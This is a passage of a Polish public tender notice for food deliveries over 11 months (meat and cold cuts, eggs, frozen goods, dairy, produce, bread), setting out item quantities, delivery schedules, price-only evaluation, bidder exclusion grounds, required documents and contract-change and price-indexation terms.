kości Jakość I	kg	750<br/>3.	Mięso wieprzowe - szynka wieprzowa świeża bez kości Jakość I	kg	30<br/>4.	Mięso drobiowe z kurczaka - filet z piersi kurczaka Jakość I	kg	750<br/>5.	Wędliny - polędwica sopocka zawartość mięsa wieprzowego ze schabu co najmniej 83%, wędzona, parzona, szynka konserwowa	kg	60<br/>6.	Wędliny - szynka z indyka zawartość mięsa z indyka co najmniej 90%	kg	20<br/>7.	Wędliny szynka z kurczaka zawartość mięsa z kurczaka co najmniej 90%	kg	20<br/>8.	Pasztet drobiowy wielkopolski	kg	10<br/>9.	Mięso wieprzowe - parówki z szynki zawartość mięsa z szynki co najmniej 90%	kg	200<br/>10.	Kiełbasa krakowska wędzona 60% mięsa wieprzowego	kg	5<br/>11.	Kiełbasa zwyczajna extra zaw mięsa wieprzowego nie mniej niż 50 %	kg	90<br/>12.	Kiełbasa szynkowa zaw mięsa wieprzowego min 90 %	kg	40<br/>13.	Lencz królewski zawartość mięsa wieprzowego min 60%, zaw miesa drobiowego min 30%	kg	20<br/>14.	Wędzonka kg	50<br/>15.	Kiełbasa swojska	kg	15<br/>16.	Kiełbasa krucha z szynki	kg	10<br/>17.	Żeberka	kg	70<br/>18.	Słonina	kg	12<br/>19.	Podgardle wędzone zaw mięsa wieprzowego min 90 %	kg	40<br/>20.	Kiełbasa biała kg	10<br/>21.	Polędwica miodowa z piersi kurczaka kg	40<br/>22.	Ćwiartka z kurczaka	kg	100<br/>23.	Mięso drobiowe z indyka - filet z piersi indyka Jakość I	kg	200<br/>24.	Mięso wieprzowe - łopatka świeża bez kości Jakość I	kg	100<br/>25.	Mięso wieprzowe - boczek wędzony Jakość I	kg	30<br/>26.	Udziec z kurczaka bez kości	kg	80<br/>27.	Udziec z kurczaka z kością	kg	140<br/>28.	Podudzie z kurczaka kg	50<br/>Dostawa 2 razy w tygodniu (wtorek, czwartek) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15110000-2 - Mięso</p> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15131130-5 - Wędliny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - Jaja świeże <br/>1	Jajka świeże kurze klasy A rozmiar M	szt.	4000<br/>Dostawa raz w tygodniu (piątek) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 - Mrożonki i produkty głęboko mrożone<br/>1.	Borówka amerykańska	kg 5<br/>2.	Truskawka bez szypułek	kg 240<br/>3.	Malina	kg 5<br/>4.	Mieszanka warzywna min. 6- składnikowa	kg 70<br/>5.	Mieszanka kompotowa owocowa min. 3- składnikowa bez pestek	kg 550<br/>6.	Bukiet/Mieszanka warzywna min. 3- składnikowa	kg 140<br/>7.	Brokuł różyczki mrożony	kg 50<br/>8.	Brukselka mrożona	kg 20<br/>9.	Marchew mini	kg 110<br/>10.	Włoszczyzna paski min. 4 składnikowa	kg 10<br/>11.	Kalafior mrożony	kg 40<br/>12.	Fasolka szparagowa zielona	kg 50<br/>13.	Frytki karbowane kg 150<br/>14.	Groszek mrożony	kg 5<br/>15.	Kostka miruna kg 650<br/>16.	Pyzy z mięsem	kg 20<br/>17.	Pierogi blanszowane, z nadzieniem ziemniaczano-serowo-cebulowym, produkt gotowany, głęboko mrożony: mąka pszenna, ziemniaki gotowane 30%, ser twarogowy z mleka 10%, cebula 2%, jaja kurze, olej roslinny, przyprawy: sól, pieprz. Farsz nie mniej niż 40%	kg 500<br/>18.	Szpinak brykiet	kg 50<br/>19.	Kartacze z mięsem	kg 150<br/>20.	Knedle z truskawką	kg 350<br/>21.	Marchew kostka mrożona kg 150<br/>22.	Zupa fasolowa	kg 150<br/>23.	Barszcz ukraiński kg 50<br/>24.	Koper mrożony	kg 16<br/>25.	Natka pietruszki mrożona	kg 16<br/>26.	Paluszki rybne o zaw mięsa z mintaja min 57% kg 350<br/>27.	Kluski śląskie kolorowe	kg 230<br/>Dostawa 1 raz w tygodniu (wtorek) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15896000-5 - Produkty głęboko mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 - Nabiał i produkty mleczarskie<br/>1.	&#34;Mleko świeże 2 % tłuszczu, pasteryzowane, butelka, opakowanie minimum 1 l wygląd i barwa jednolita, smak <br/>i zapach czysty bez obcych posmaków <br/>i zapachów, barwa jasnokremowa, konsystencja płynna, opakowanie czyste bez śladów uszkodzeń mechanicznych&#34;	szt.	500<br/>2.	Masło min.82 % tłuszczu, opakowanie min 200gdobrym smaku, nie solone, zapach charakterystyczny dla świeżego masła, bez śladów i zapachów obcych, nie dopuszcza się smaku ani zapachu zjeł-czałego świadczącego o zepsuciu arty-kułu. szt.	700<br/>3.	&#34;Twaróg tłusty 3x mielony sernikowy trzykrotnie mielony, tłusty w formie batonu <br/>o masie 600g o jednolitej konsystencji i czystym mlecznym smaku&#34;	kg	30<br/>4.	Ser biały twarogowy, półtłusty krajanka, folia	kg	150<br/>5.	Ser biały twarogowy półtłusty mielony. Skład: mleko krowie pasteryzowane, czyste kultury bakterii. Bez soli, bez dodatku cukru, bez konserwantów. Typu Twaróg wiejski półtłusty lub równoważny o powyższych parametrach	kg	30<br/>6.	Śmietana 18%: lekko kwaśny, kremowy, zapach: czysty	szt.	80<br/>7.	&#34;Śmietana 30% o dobrym smaku, charakterystycznym zapachu dla świeżych produktów mlecznych , opakowanie czyste bez śladów uszkodzeń mechanicznych. <br/>o terminie nie krótszym niż 14 dni&#34;	szt.	10<br/>8.	Jogurt naturalny 1% - 2,8 % tłuszczu; skład: mleko pasteryzowane i/lub mleko, żywe kultury bakterii (bez dodatku mleka w proszku, żelatyny) kg	250<br/>9.	Jogurt naturalny typu greckiego (w składzie bez żelatyny i mleka w proszku)	szt.	30<br/>10.	&#34;Jogurt pitny owocowy różne smaki czteropak (4x100 g)-smaki butelka plastikowa Smak łagodny , czysty charakterystyczny dla danego owocu , bez obcych posmaków, <br/>z mleka pasteryzowanego , naturalnie fermentowany , zawierający zdrowe kultury bakterii jogurtowych, szczepy , zapach czysty charakterystyczny dla danego owocu, konsystencja jednolita, gęsta z widocznymi kawałkami owoców, bez dodatkowego cukru, naturalnie zagęszczony&#34;	szt.	300<br/>11.	&#34;Jogurt pitny owocowy różne smaki -smaki butelka plastikowa Smak łagodny , czysty charakterystyczny dla danego owocu , bez obcych posmaków, <br/>z mleka pasteryzowanego , naturalnie fermentowany , zawierający zdrowe kultury bakterii jogurtowych, szczepy , zapach czysty charakterystyczny dla danego owocu, konsystencja jednolita, gęsta z widocznymi kawałkami owoców, bez dodatkowego cukru, naturalnie zagęszczony&#34;	szt.	600<br/>12.	&#34;Jogurt owocowy rożne smaki 30% owoców plastikowy kubeczek Smak łagodny , czysty charakterystyczny dla danego owocu , bez obcych posmaków, <br/>z mleka pasteryzowanego , naturalnie fermentowany , zawierający zdrowe kultury bakterii jogurtowych, szczepy , zapach czysty charakterystyczny dla danego owocu, konsystencja jednolita, gęsta z widocznymi kawałkami owoców, bez dodatkowego cukru, naturalnie zagęszczony&#34;	szt.	350<br/>13.	Serek homogenizowany waniliowy-produkt mleczarski wytwarzany z twarogu, zazwyczaj uszlachetniony śmietanką, zaliczany do niedojrzewających serów twarogowo-kwasowych	szt.	350<br/>14.	Serek kanapkowy śmietankowy	szt.	30<br/>15.	Deser czekoladowy mleko 49% śmietanka, kakao w proszku o obniżonej zawartości tłuszczu.	szt.	200<br/>16.	Mleko świeże 2 % tłuszczu, UHT, karton, opakowanie minimum 1 l	l	2600<br/>17.	Ser biały twarogowy, chudy blok pergamin	kg	50<br/>18.	Śmietana 12%	szt.	250<br/>19.	Ser salami blok podpuszczkowy, dojrzewający	kg	150<br/>20.	Masło mix zawartość tłuszczu 68 % bez śladów i obcych zapachów,	szt.	50<br/>21.	Mleko roślinne l	40<br/>22.	&#34;Margaryna do pieczenia-bez śladów i obcych zapachów, <br/>nie dopuszcza się smaku ani zapachu zjełczałego świadczącego o zepsuciu&#34;	szt.	20<br/>23.	Mleko bez laktozy świeże 2 % tłuszczu UHT, karton, opakowanie minimum 1 l	l	20<br/>24.	Mleko bez laktozy świeże 2 % tłuszczu, pasteryzowane, butelka, opakowanie minimum 1 l l	40<br/>25.	Ser żółty bez laktozy w plastrach opakowanie 150 g szt.	15<br/>26.	Ser biały twarogowy bez laktozy, półtłusty szt.	15<br/>27.	Serek topiony śmietankow- kremowy kostka, jednolita kremowa konsystencja	szt.	400<br/>Dostawa 2 razy w tygodniu (wtorek, piatek) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 - Warzywa i owoce<br/>1.	Jabłka	kg	1000<br/>2.	Sałata rzymska	szt.	30<br/>3.	Banan	kg	1000<br/>4.	Gruszka	kg	200<br/>5.	Kiwi	kg	40<br/>6.	Cytryna	kg	25<br/>7.	Pomarańcze	kg	250<br/>8.	Nektarynka	kg	20<br/>9.	Brzoskwinia	kg	20<br/>10.	Mandarynka	kg	300<br/>11.	Rukola ( opakowanie folia)	szt.	5<br/>12.	Papryka czerwona	kg	80<br/>13.	Sałata lodowa	szt.	300<br/>14.	Ziemniaki	kg	5000<br/>15.	Marchew	kg	600<br/>16.	Seler	kg	150<br/>17.	Pietruszka korzeń	kg	150<br/>18.	Pietruszka natka	szt.	20<br/>19.	Koper świeży szt.	20<br/>20.	Szczypiorek świeży	szt.	100<br/>21.	Cebula biała	kg	50<br/>22.	Czosnek polski główka	szt.	80<br/>23.	Kalafior świeży	kg	10<br/>24.	Brokuł świeży	kg	5<br/>25.	Buraczki ćwikłowe	kg	100<br/>26.	Rzodkiewka czerwona szt.	70<br/>27.	Kapusta biała	kg	300<br/>28.	Kapusta kiszona	kg	150<br/>29.	Kapusta pekińska	kg	150<br/>31.	Ogórek zielony szklarniowy	kg	400<br/>32.	Pomidor	kg	300<br/>33. Pomidory koktajlowe	kg	10<br/>34.	Sałata masłowa	szt.	50<br/>35.	Por	kg	150<br/>36.	Truskawka sezonowa kg	50<br/>37.	Borówka ameryk.	kg	20<br/>38.	Morela	kg	20<br/>39.	Arbuz sezonowy	kg	20<br/>40.	Pieczarka	kg	90<br/>41.	Śliwka	kg	50<br/>42.	Ziemniaki młode kg	500<br/>43.	Kapusta młoda	kg	100<br/>44.	Cebula czerwona	kg	20<br/>45.	Kapusta czerwona	kg	40<br/>46.	Cukinia	kg	15<br/>Dostawa 2 razy w tygodniu (poniedziałek, środa) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 - Pieczywo<br/>1.	Chleb zwykły pszenno / żytni szt.	1200<br/>2.	Chleb mieszany z ziarnami krojony	szt.	150<br/>3.	Chleb graham krojony	szt.	500<br/>4.	Chleb tostowy	szt.	50<br/>5.	Bułka zwykła	szt.	650<br/>6.	Bułka drożdżowa ser lub marmolada typu strucla	szt.	50<br/>7.	Bagietka	szt.	15<br/>8.	Bułka Chałka	szt.	100<br/>9.	Bułka maślana z żurawina typu stokrotka	szt.	30<br/>10.	Drożdżówka mini ser / marmolada	szt.	400<br/>11.	Rogaliki małe	szt.	100<br/>12.	Mini pączek	szt.	100<br/>13.	Bułka tarta	szt.	220<br/>14.	Wek	szt.	150<br/>15.	Chleb graham ziarnisty	szt.	100<br/>16.	Babka piaskowa	szt.	20<br/>17.	Chleb śniadaniowy szt.	50<br/>18.	Bułka zwykła mini/ kajzerka	szt.	300<br/>Dostawa pieczywa codziennie do godz. 7:30 od poniedziałku do piątku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15811000-6 - Pieczywo</p> <p class="mb-0">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca podlega wykluczeniu także w oparciu o podstawy wykluczenia wskazane art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 514).<br/>2. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca na dzień<br/>składania ofert nie podlega wykluczeniu.<br/>3. Oświadczenie należy złożyć wg wymogów Załącznika Nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga w niniejszym postępowaniu podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Na potrzeby oceny ofert oferta musi zawierać:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 1 do SWZ (przy czym Wykonawca może<br/>sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach)<br/>wraz z formularzem asortymentowo – cenowym;<br/>2) Oświadczenie wykonawcy ubiegającego się o udzielenie zamówienia składanego na podstawie art. 125 ust. 1 ustawy<br/>Pzp, o którym mowa w rozdziale 8.1 SWZ - Załącznik nr 2 do SWZ;<br/>3) Uzasadnienie do zastrzeżenia informacji znajdujących się w ofercie jako tajemnica przedsiębiorstwa (jeżeli dotyczy);<br/>4) Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest<br/>umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a),<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy.<br/>5) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: oświadczenie, o którym mowa w pkt. 8.1<br/>SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak<br/>podstaw wykluczenia w zakresie, w jakim każdy z wykonawców wykazuje brak podstaw wykluczenia w postępowaniu.<br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 ustawy Prawo Zamówień Publicznych oraz w następujących okolicznościach:<br/>a)	zmiany asortymentu, w tym zmiany numeru katalogowego, modelu, typu produktu, na asortyment inny, lub poprzez dodanie nowego, o parametrach i funkcjonalności nie gorszych, niż wykazany w ofercie, z zastrzeżeniem, że cena tego asortymentu nie ulegnie podwyższeniu,<br/>b)	zaoferowania w wyniku postępu technologicznego produktu o lepszych parametrach w cenie oferowanej w postępowaniu przetargowym albo niższej, wraz ze zmianą nazwy produktu i numeru katalogowego;<br/>c)	zmiana producenta lub zaprzestanie produkcji przez dotychczasowego producenta z przyczyn niezależnych od Wykonawcy z zastrzeżeniem, że Wykonawca zaoferuje produkt równoważny o takich samych lub lepszych parametrach w cenie oferowanej w postępowaniu przetargowym albo niższej, wraz ze zmianą nazwy produktu i numeru katalogowego;<br/>d)	zmiana przepisów obowiązujących, mających wpływ na realizację niniejszej umowy;<br/>e)	w przypadku zmiany ceny w wyniku zmiany przepisów prawa podatkowego dotyczącej stawek VAT w okresie obowiązywania umowy, przy czym zmiana dotyczyć może wartości brutto, wartość netto pozostaje bez zmian;<br/>Zmiany wymienione w ust. 1 mogą być dokonane na wniosek Wykonawcy, z uzasadnieniem konieczności zmiany, za zgodą Zamawiającego, w terminie do 14 dni od przesłania zawiadomienia, w formie pisemnego aneksu do umowy.<br/>2.	Waloryzacja wynagrodzenia umownego w przypadku zmiany kosztów związanych z realizacją zamówienia, zgodnie z art. 439 ust. 1-4 ustawy Pzp, jest możliwa według następujących zasad:<br/>a)	Po upływie okresu 6 miesięcy (termin początkowy) zamawiający dopuszcza zmianę wysokości wynagrodzenia (waloryzacja) w sytuacji, gdy ceny jednostkowe określone w załączniku do Umowy wzrosną o co najmniej 20% w porównaniu do cen zakupu asortymentu, o których mowa, względem ceny lub kosztu przyjętych w celu ustalenia wynagrodzenia wykonawcy zawartego w formularzu asortymentowo-cenowym stanowiącym załącznik nr 1 do umowy,<br/>b)	Wykonawca wnioskujący o dokonanie zmiany wysokości wynagrodzenia przedstawia projekt aneksu do umowy z wykazem rodzaju wszystkich cen brutto zł asortymentu objętego niniejsza umową, uprawniających do żądania zmiany wynagrodzenia wraz z dowodami będącymi podstawą do akceptacji aneksu, tj. kserokopiami faktur zakupu asortymentu przyjętego w celu ustalenia wynagrodzenia wykonawcy zawartego w ofercie oraz z zakupami tego asortymentu w 6 miesiącu realizacji umowy. We wniosku o zmianę umowy wykonawca przedstawia także wyszczególnienie ilości asortymentu każdej wykazanej pozycji potrzebnej do końca realizacji umowy;<br/>c)	Jeżeli wartość asortymentu 